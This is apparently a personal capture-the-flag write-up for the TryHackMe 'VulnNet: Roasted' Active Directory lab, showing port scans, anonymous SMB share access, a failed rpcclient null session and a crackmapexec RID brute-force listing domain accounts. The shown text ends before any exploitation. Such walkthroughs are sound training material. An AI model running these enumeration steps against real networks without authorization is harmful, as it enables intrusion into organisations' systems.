VulnNet: Roasted

Start Machine

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.

  • Difficulty: Easy

  • Operating System: Windows

This is a much simpler machine, do not overthink. You can do it by following common methodologies.

Note: It might take up to 6 minutes for this machine to fully boot.

Icon made by DinosoftLabs from www.flaticon.com

Answer the questions below

┌──(kali㉿kali)-[~]
└─$ rustscan -a 10.10.60.167 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.60.167:53
Open 10.10.60.167:88
Open 10.10.60.167:135
Open 10.10.60.167:139
Open 10.10.60.167:389
Open 10.10.60.167:445
Open 10.10.60.167:464
Open 10.10.60.167:593
Open 10.10.60.167:636
Open 10.10.60.167:3269
Open 10.10.60.167:3268
Open 10.10.60.167:5985
Open 10.10.60.167:9389
Open 10.10.60.167:49665
Open 10.10.60.167:49669
Open 10.10.60.167:49670
Open 10.10.60.167:49672
Open 10.10.60.167:49703
Open 10.10.60.167:49790
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-29 22:24 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 22:24
Completed Parallel DNS resolution of 1 host. at 22:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 22:24
Scanning 10.10.60.167 [19 ports]
Discovered open port 139/tcp on 10.10.60.167
Discovered open port 135/tcp on 10.10.60.167
Discovered open port 53/tcp on 10.10.60.167
Discovered open port 445/tcp on 10.10.60.167
Discovered open port 389/tcp on 10.10.60.167
Discovered open port 88/tcp on 10.10.60.167
Discovered open port 3269/tcp on 10.10.60.167
Discovered open port 49669/tcp on 10.10.60.167
Discovered open port 9389/tcp on 10.10.60.167
Discovered open port 49790/tcp on 10.10.60.167
Discovered open port 464/tcp on 10.10.60.167
Discovered open port 49670/tcp on 10.10.60.167
Discovered open port 636/tcp on 10.10.60.167
Discovered open port 49665/tcp on 10.10.60.167
Discovered open port 49672/tcp on 10.10.60.167
Discovered open port 49703/tcp on 10.10.60.167
Discovered open port 5985/tcp on 10.10.60.167
Discovered open port 593/tcp on 10.10.60.167
Discovered open port 3268/tcp on 10.10.60.167
Completed Connect Scan at 22:24, 0.50s elapsed (19 total ports)
Initiating Service scan at 22:24
Scanning 19 services on 10.10.60.167
Completed Service scan at 22:25, 57.96s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.60.167.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:25
NSE Timing: About 99.96% done; ETC: 22:26 (0:00:00 remaining)
Completed NSE at 22:26, 40.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:26
Completed NSE at 22:26, 14.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:26
Completed NSE at 22:26, 0.00s elapsed
Nmap scan report for 10.10.60.167
Host is up, received user-set (0.25s latency).
Scanned at 2022-12-29 22:24:51 EST for 113s

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-12-30 03:24:59Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack Microsoft Windows RPC
49703/tcp open  msrpc         syn-ack Microsoft Windows RPC
49790/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 32166/tcp): CLEAN (Timeout)
|   Check 2 (port 50927/tcp): CLEAN (Timeout)
|   Check 3 (port 22994/udp): CLEAN (Timeout)
|   Check 4 (port 9159/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-time: 
|   date: 2022-12-30T03:25:53
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:26
Completed NSE at 22:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:26
Completed NSE at 22:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:26
Completed NSE at 22:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.17 seconds

Domain: vulnnet-rst.local

Starting with the Samba shares, we can use smbclient to list the network shares

┌──(kali㉿kali)-[~]
└─$ smbclient -N -L 10.10.60.167

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.60.167 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbmap will also reveal the permissions

┌──(kali㉿kali)-[~]
└─$ smbmap -u anonymous -H 10.10.60.167 
[+] Guest session       IP: 10.10.60.167:445    Name: 10.10.60.167                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing

getting files

┌──(kali㉿kali)-[~/VulnNet]
└─$ smbclient -N \\\\10.10.60.167\\VulnNet-Business-Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 12 21:46:40 2021
  ..                                  D        0  Fri Mar 12 21:46:40 2021
  Business-Manager.txt                A      758  Thu Mar 11 20:24:34 2021
  Business-Sections.txt               A      654  Thu Mar 11 20:24:34 2021
  Business-Tracking.txt               A      471  Thu Mar 11 20:24:34 2021

                8771839 blocks of size 4096. 4554468 blocks available
smb: \> get Business-Manager.txt 
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Business-Sections.txt 
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Business-Tracking.txt 
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> quit

┌──(kali㉿kali)-[~/VulnNet]
└─$ smbclient -N \\\\10.10.60.167\\VulnNet-Enterprise-Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 12 21:46:40 2021
  ..                                  D        0  Fri Mar 12 21:46:40 2021
  Enterprise-Operations.txt           A      467  Thu Mar 11 20:24:34 2021
  Enterprise-Safety.txt               A      503  Thu Mar 11 20:24:34 2021
  Enterprise-Sync.txt                 A      496  Thu Mar 11 20:24:34 2021

                8771839 blocks of size 4096. 4554452 blocks available
smb: \> get Enterprise-Operations.txt 
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Enterprise-Safety.txt 
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Enterprise-Sync.txt 
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> quit


┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Business-Manager.txt 
VULNNET BUSINESS
~~~~~~~~~~~~~~~~~~~

Alexa Whitehat is our core business manager. All business-related offers, campaigns, and advertisements should be directed to her. 
We understand that when you’ve got questions, especially when you’re on a tight proposal deadline, you NEED answers. 
Our customer happiness specialists are at the ready, armed with friendly, helpful, timely support by email or online messaging.
We’re here to help, regardless of which you plan you’re on or if you’re just taking us for a test drive.
Our company looks forward to all of the business proposals, we will do our best to evaluate all of your offers properly. 
To contact our core business manager call this number: 1337 0000 7331

~VulnNet Entertainment
~TryHackMe
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Business-Sections.txt 
VULNNET BUSINESS
~~~~~~~~~~~~~~~~~~~

Jack Goldenhand is the person you should reach to for any business unrelated proposals.
Managing proposals is a breeze with VulnNet. We save all your case studies, fees, images and team bios all in one central library.
Tag them, search them and drop them into your layout. Proposals just got... dare we say... fun?
No more emailing big PDFs, printing and shipping proposals or faxing back signatures (ugh).
Your client gets a branded, interactive proposal they can sign off electronically. No need for extra software or logins.
Oh, and we tell you as soon as your client opens it.

~VulnNet Entertainment
~TryHackMe
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Business-Tracking.txt 
VULNNET TRACKING
~~~~~~~~~~~~~~~~~~

Keep a pulse on your sales pipeline of your agency. We let you know your close rate,
which sections of your proposals get viewed and for how long,
and all kinds of insight into what goes into your most successful proposals so you can sell smarter.
We keep track of all necessary activities and reach back to you with newly gathered data to discuss the outcome. 
You won't miss anything ever again. 

~VulnNet Entertainment
~TryHackMe
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Enterprise-Operations.txt 
VULNNET OPERATIONS
~~~~~~~~~~~~~~~~~~~~

We bring predictability and consistency to your process. Making it repetitive doesn’t make it boring. 
Set the direction, define roles, and rely on automation to keep reps focused and make onboarding a breeze.
Don't wait for an opportunity to knock - build the door. Contact us right now.
VulnNet Entertainment is fully commited to growth, security and improvement.
Make a right decision!

~VulnNet Entertainment
~TryHackMe
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Enterprise-Safety.txt    
VULNNET SAFETY
~~~~~~~~~~~~~~~~

Tony Skid is a core security manager and takes care of internal infrastructure.
We keep your data safe and private. When it comes to protecting your private information...
we’ve got it locked down tighter than Alcatraz. 
We partner with TryHackMe, use 128-bit SSL encryption, and create daily backups. 
And we never, EVER disclose any data to third-parties without your permission. 
Rest easy, nothing’s getting out of here alive.

~VulnNet Entertainment
~TryHackMe
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ cat Enterprise-Sync.txt  
VULNNET SYNC
~~~~~~~~~~~~~~

Johnny Leet keeps the whole infrastructure up to date and helps you sync all of your apps.
Proposals are just one part of your agency sales process. We tie together your other software, so you can import contacts from your CRM,
auto create deals and generate invoices in your accounting software. We are regularly adding new integrations.
Say no more to desync problems.
To contact our sync manager call this number: 7331 0000 1337

~VulnNet Entertainment
~TryHackMe


just for me

──(kali㉿kali)-[~/VulnNet]
└─$ pip3 install kerbrute
Defaulting to user installation because normal site-packages is not writeable
Collecting kerbrute
  Downloading kerbrute-0.0.2-py3-none-any.whl (17 kB)
Requirement already satisfied: impacket in /usr/local/lib/python3.10/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.10.egg (from kerbrute) (0.9.24.dev1+20210704.162046.29ad5792)
Requirement already satisfied: chardet in /home/kali/.local/lib/python3.10/site-packages (from impacket->kerbrute) (5.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->kerbrute) (2.2.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->kerbrute) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->kerbrute) (2.9.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->kerbrute) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->kerbrute) (21.0.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/local/lib/python3.10/dist-packages (from impacket->kerbrute) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->kerbrute) (3.11.0)
Requirement already satisfied: six in /usr/local/lib/python3.10/dist-packages (from impacket->kerbrute) (1.16.0)
Installing collected packages: kerbrute
  WARNING: The script kerbrute is installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.                                                                                                         
Successfully installed kerbrute-0.0.2                                                                         
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ kerbrute
kerbrute: command not found
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
                                                                                                              
┌──(kali㉿kali)-[~/VulnNet]
└─$ export PATH=/home/kali/.local/bin:$PATH

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb/rpcclient-enumeration

rpcclient es una herramienta de línea de comandos que se utiliza para interactuar con servicios de Protocolo de Mensajería de Red (RPC, por sus siglas en inglés) en sistemas operativos basados en Unix. RPC es una tecnología que permite a los programas en diferentes sistemas operativos comunicarse entre sí a través de una red.

rpcclient se utiliza a menudo para probar y depurar servicios RPC, y también puede utilizarse para realizar tareas de administración de red y para explorar la información disponible en un servidor RPC. Para utilizar rpcclient, debe conocer el nombre del servicio RPC al que desea conectarse y el puerto en el que está escuchando el servicio.

Una vez que se ha conectado a un servidor RPC utilizando rpcclient, puede utilizar comandos para realizar diferentes acciones, como listar los servicios disponibles, ver información sobre un servicio específico o realizar llamadas a procedimientos remotos.

En resumen, rpcclient es una herramienta útil para interactuar con servicios RPC y realizar tareas de administración de red en sistemas operativos basados en Unix.

Active Directory es un servicio de directorio de Microsoft que se utiliza en redes empresariales para almacenar y gestionar información sobre usuarios, dispositivos y recursos de la red. Active Directory utiliza el Protocolo de Mensajería de Red (RPC, por sus siglas en inglés) para permitir que los programas se comuniquen con el servicio de directorio y realicen tareas de administración de la red.

Para interactuar con Active Directory, puede utilizar diferentes herramientas y utilidades, como el Administrador de Active Directory, el Módulo de PowerShell para Active Directory o la herramienta de línea de comandos rpcclient. Estas herramientas le permiten realizar tareas de administración de la red, como agregar y eliminar usuarios, crear grupos y asignar permisos, y gestionar dispositivos y recursos de la red.

En resumen, Active Directory es un servicio de directorio que se utiliza en redes empresariales para almacenar y gestionar información sobre usuarios, dispositivos y recursos de la red. Puede utilizar herramientas como el Administrador de Active Directory, PowerShell o rpcclient para interactuar con Active Directory y realizar tareas de administración de la red.


┌──(kali㉿kali)-[~/VulnNet]
└─$ rpcclient -U "" 10.10.21.40
Password for [WORKGROUP\]:
rpcclient $> help
---------------         ----------------------
       UNIXINFO
       getpwuid         Get shell and homedir
       uidtosid         Convert uid to sid
---------------         ----------------------
         MDSSVC
fetch_properties                Fetch connection properties
fetch_attributes                Fetch attributes for a CNID
---------------         ----------------------
        CLUSAPI
clusapi_open_cluster            Open cluster
clusapi_get_cluster_name                Get cluster name
clusapi_get_cluster_version             Get cluster version
clusapi_get_quorum_resource             Get quorum resource
clusapi_create_enum             Create enum query
clusapi_create_enumex           Create enumex query
clusapi_open_resource           Open cluster resource
clusapi_online_resource         Set cluster resource online
clusapi_offline_resource                Set cluster resource offline
clusapi_get_resource_state              Get cluster resource state
clusapi_get_cluster_version2            Get cluster version2
clusapi_pause_node              Pause cluster node
clusapi_resume_node             Resume cluster node
---------------         ----------------------
        WITNESS
GetInterfaceList                List the interfaces to which witness client connections can be made
       Register         Register for resource state change notifications of a NetName and IPAddress
     UnRegister         Unregister for notifications from the server</para></listitem></varlistentry>
    AsyncNotify         Request notification of registered resource changes from the server
     RegisterEx         Register for resource state change notifications of a NetName, ShareName and multiple IPAddresses
---------------         ----------------------
          FSRVP
fss_is_path_sup         Check whether a share supports shadow-copy requests
fss_get_sup_version             Get supported FSRVP version from server
fss_create_expose               Request shadow-copy creation and exposure
     fss_delete         Request shadow-copy share deletion
fss_has_shadow_copy             Check for an associated share shadow-copy
fss_get_mapping         Get shadow-copy share mapping information
fss_recovery_complete           Flag read-write snapshot as recovery complete, allowing further shadow-copy requests
---------------         ----------------------
         WINREG
 winreg_enumkey         Enumerate Keys
querymultiplevalues             Query multiple values
querymultiplevalues2            Query multiple values
---------------         ----------------------
       EVENTLOG
eventlog_readlog                Read Eventlog
eventlog_numrecord              Get number of records
eventlog_oldestrecord           Get oldest record
eventlog_reportevent            Report event
eventlog_reporteventsource              Report event and source
eventlog_registerevsource               Register event source
eventlog_backuplog              Backup Eventlog File
eventlog_loginfo                Get Eventlog Information
---------------         ----------------------
        DRSUAPI
   dscracknames         Crack Name
    dsgetdcinfo         Get Domain Controller Info
 dsgetncchanges         Get NC Changes
dswriteaccountspn               Write Account SPN
---------------         ----------------------
         NTSVCS
ntsvcs_getversion               Query NTSVCS version
ntsvcs_validatedevinst          Query NTSVCS device instance
ntsvcs_hwprofflags              Query NTSVCS HW prof flags
ntsvcs_hwprofinfo               Query NTSVCS HW prof info
ntsvcs_getdevregprop            Query NTSVCS device registry property
ntsvcs_getdevlistsize           Query NTSVCS device list size
ntsvcs_getdevlist               Query NTSVCS device list
---------------         ----------------------
         WKSSVC
wkssvc_wkstagetinfo             Query WKSSVC Workstation Information
wkssvc_getjoininformation               Query WKSSVC Join Information
wkssvc_messagebuffersend                Send WKSSVC message
wkssvc_enumeratecomputernames           Enumerate WKSSVC computer names
wkssvc_enumerateusers           Enumerate WKSSVC users
---------------         ----------------------
       SHUTDOWN
---------------         ----------------------
       EPMAPPER
         epmmap         Map a binding
      epmlookup         Lookup bindings
---------------         ----------------------
           ECHO
     echoaddone         Add one to a number
       echodata         Echo data
       sinkdata         Sink data
     sourcedata         Source data
---------------         ----------------------
            DFS
     dfsversion         Query DFS support
         dfsadd         Add a DFS share
      dfsremove         Remove a DFS share
     dfsgetinfo         Query DFS share info
        dfsenum         Enumerate dfs shares
      dfsenumex         Enumerate dfs shares
---------------         ----------------------
         SRVSVC
        srvinfo         Server query info
   netshareenum         Enumerate shares
netshareenumall         Enumerate all shares
netsharegetinfo         Get Share Info
netsharesetinfo         Set Share Info
netsharesetdfsflags             Set DFS flags
    netfileenum         Enumerate open files
   netremotetod         Fetch remote time of day
netnamevalidate         Validate sharename
  netfilegetsec         Get File security
     netsessdel         Delete Session
    netsessenum         Enumerate Sessions
    netdiskenum         Enumerate Disks
    netconnenum         Enumerate Connections
    netshareadd         Add share
    netsharedel         Delete share
---------------         ----------------------
       NETLOGON
     logonctrl2         Logon Control 2
   getanydcname         Get trusted DC name
      getdcname         Get trusted PDC name
  dsr_getdcname         Get trusted DC name
dsr_getdcnameex         Get trusted DC name
dsr_getdcnameex2                Get trusted DC name
dsr_getsitename         Get sitename
dsr_getforesttrustinfo          Get Forest Trust Info
      logonctrl         Logon Control
       samlogon         Sam Logon
change_trust_pw         Change Trust Account Password
    gettrustrid         Get trust rid
dsr_enumtrustdom                Enumerate trusted domains
dsenumdomtrusts         Enumerate all trusted domains in an AD forest
deregisterdnsrecords            Deregister DNS records
netrenumtrusteddomains          Enumerate trusted domains
netrenumtrusteddomainsex                Enumerate trusted domains
getdcsitecoverage               Get the Site-Coverage from a DC
   capabilities         Return Capabilities
logongetdomaininfo              Return LogonGetDomainInfo
---------------         ----------------------
IRemoteWinspool
winspool_AsyncOpenPrinter               Open printer handle
winspool_AsyncCorePrinterDriverInstalled                Query Core Printer Driver Installed
---------------         ----------------------
        SPOOLSS
      adddriver         Add a print driver
     addprinter         Add a printer
      deldriver         Delete a printer driver
    deldriverex         Delete a printer driver with files
       enumdata         Enumerate printer data
     enumdataex         Enumerate printer data for a key
        enumkey         Enumerate printer keys
       enumjobs         Enumerate print jobs
         getjob         Get print job
         setjob         Set print job
      enumports         Enumerate printer ports
    enumdrivers         Enumerate installed printer drivers
   enumprinters         Enumerate printers
        getdata         Get print driver data
      getdataex         Get printer driver data with keyname
      getdriver         Get print driver information
   getdriverdir         Get print driver upload directory
getdriverpackagepath            Get print driver package download directory
     getprinter         Get printer info
    openprinter         Open printer handle
 openprinter_ex         Open printer handle
      setdriver         Set printer driver
getprintprocdir         Get print processor directory
        addform         Add form
        setform         Set form
        getform         Get form
     deleteform         Delete form
      enumforms         Enumerate forms
     setprinter         Set printer comment
 setprintername         Set printername
 setprinterdata         Set REG_SZ printer data
       rffpcnex         Rffpcnex test
     printercmp         Printer comparison test
      enumprocs         Enumerate Print Processors
enumprocdatatypes               Enumerate Print Processor Data Types
   enummonitors         Enumerate Print Monitors
createprinteric         Create Printer IC
playgdiscriptonprinteric                Create Printer IC
getcoreprinterdrivers           Get CorePrinterDriver
enumpermachineconnections               Enumerate Per Machine Connections
addpermachineconnection         Add Per Machine Connection
delpermachineconnection         Delete Per Machine Connection
---------------         ----------------------
           SAMR
      queryuser         Query user info
     querygroup         Query group info
queryusergroups         Query user groups
queryuseraliases                Query user aliases
  querygroupmem         Query group membership
  queryaliasmem         Query alias membership
 queryaliasinfo         Query alias info
    deletealias         Delete an alias
  querydispinfo         Query display info
 querydispinfo2         Query display info
 querydispinfo3         Query display info
   querydominfo         Query domain info
   enumdomusers         Enumerate domain users
  enumdomgroups         Enumerate domain groups
  enumalsgroups         Enumerate alias groups
    enumdomains         Enumerate domains
  createdomuser         Create domain user
 createdomgroup         Create domain group
 createdomalias         Create domain alias
 samlookupnames         Look up names
  samlookuprids         Look up names
 deletedomgroup         Delete domain group
  deletedomuser         Delete domain user
 samquerysecobj         Query SAMR security object
   getdompwinfo         Retrieve domain password info
getusrdompwinfo         Retrieve user domain password info
   lookupdomain         Lookup Domain Name
      chgpasswd         Change user password
     chgpasswd2         Change user password
     chgpasswd3         Change user password
     chgpasswd4         Change user password
 getdispinfoidx         Get Display Information Index
    setuserinfo         Set user info
   setuserinfo2         Set user info2
---------------         ----------------------
      LSARPC-DS
  dsroledominfo         Get Primary Domain Information
---------------         ----------------------
         LSARPC
       lsaquery         Query info policy
     lookupsids         Convert SIDs to names
    lookupsids3         Convert SIDs to names
lookupsids_level                Convert SIDs to names
    lookupnames         Convert names to SIDs
   lookupnames4         Convert names to SIDs
lookupnames_level               Convert names to SIDs
      enumtrust         Enumerate trusted domains
      enumprivs         Enumerate privileges
    getdispname         Get the privilege name
     lsaenumsid         Enumerate the LSA SIDS
lsacreateaccount                Create a new lsa account
lsaenumprivsaccount             Enumerate the privileges of an SID
lsaenumacctrights               Enumerate the rights of an SID
     lsaaddpriv         Assign a privilege to a SID
     lsadelpriv         Revoke a privilege from a SID
lsaaddacctrights                Add rights to an account
lsaremoveacctrights             Remove rights from an account
lsalookupprivvalue              Get a privilege value given its name
 lsaquerysecobj         Query LSA security object
lsaquerytrustdominfo            Query LSA trusted domains info (given a SID)
lsaquerytrustdominfobyname              Query LSA trusted domains info (given a name), only works for Windows > 2k
lsaquerytrustdominfobysid               Query LSA trusted domains info (given a SID)
lsasettrustdominfo              Set LSA trusted domain info
    getusername         Get username
   createsecret         Create Secret
   deletesecret         Delete Secret
    querysecret         Query Secret
      setsecret         Set Secret
retrieveprivatedata             Retrieve Private Data
storeprivatedata                Store Private Data
 createtrustdom         Create Trusted Domain
 deletetrustdom         Delete Trusted Domain
---------------         ----------------------
GENERAL OPTIONS
           help         Get help on commands
              ?         Get help on commands
     debuglevel         Set debug level
          debug         Set debug level
           list         List available commands on <pipe>
           exit         Exit program
           quit         Exit program
           sign         Force RPC pipe connections to be signed
           seal         Force RPC pipe connections to be sealed
         packet         Force RPC pipe connections with packet authentication level
       schannel         Force RPC pipe connections to be sealed with 'schannel'. Assumes valid machine account to this domain controller.
   schannelsign         Force RPC pipe connections to be signed (not sealed) with 'schannel'.  Assumes valid machine account to this domain controller.
        timeout         Set timeout (in milliseconds) for RPC operations
      transport         Choose ncacn transport for RPC operations
           none         Force RPC pipe connections to have no special properties
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/

till tomorrow :) turuturu

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb#crackmapexec

As we have a read access to IPC$ without authentication, we are able to list the domain users as anonymous

IPC$ share[](#ipcusd-share)

From book **_Network Security Assessment 3rd edition_**

With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:

-   Operating system information
    

-   Details of the parent domain
    

-   A list of local users and groups
    

-   Details of available SMB shares
    

-   The effective system security policy


https://book.hacktricks.xyz/windows-hardening/ntlm


two ways to enum users(using crackmapexec and impacket (lookupsid.py))

┌──(kali㉿kali)-[~/VulnNet]
└─$ sudo crackmapexec smb 10.10.129.88 -u 'guest' -p '' --rid-brute
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\guest: 
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  [+] Brute forcing RIDs
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                                                                 
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  500: VULNNET-RST\Administrator (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  501: VULNNET-RST\Guest (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  502: VULNNET-RST\krbtgt (SidTypeUser)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  514: VULNNET-RST\Domain Guests (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  515: VULNNET-RST\Domain Computers (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  516: VULNNET-RST\Domain Controllers (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  517: VULNNET-RST\Cert Publishers (SidTypeAlias)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  518: VULNNET-RST\Schema Admins (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)                                                                                                             
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)                                                                                                            
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)                                                                                                            
SMB         10.10.129.88    445    WIN-2BO8M1OE1M1  525: VULNNET-RST\Protected Users (SidTypeGroup)
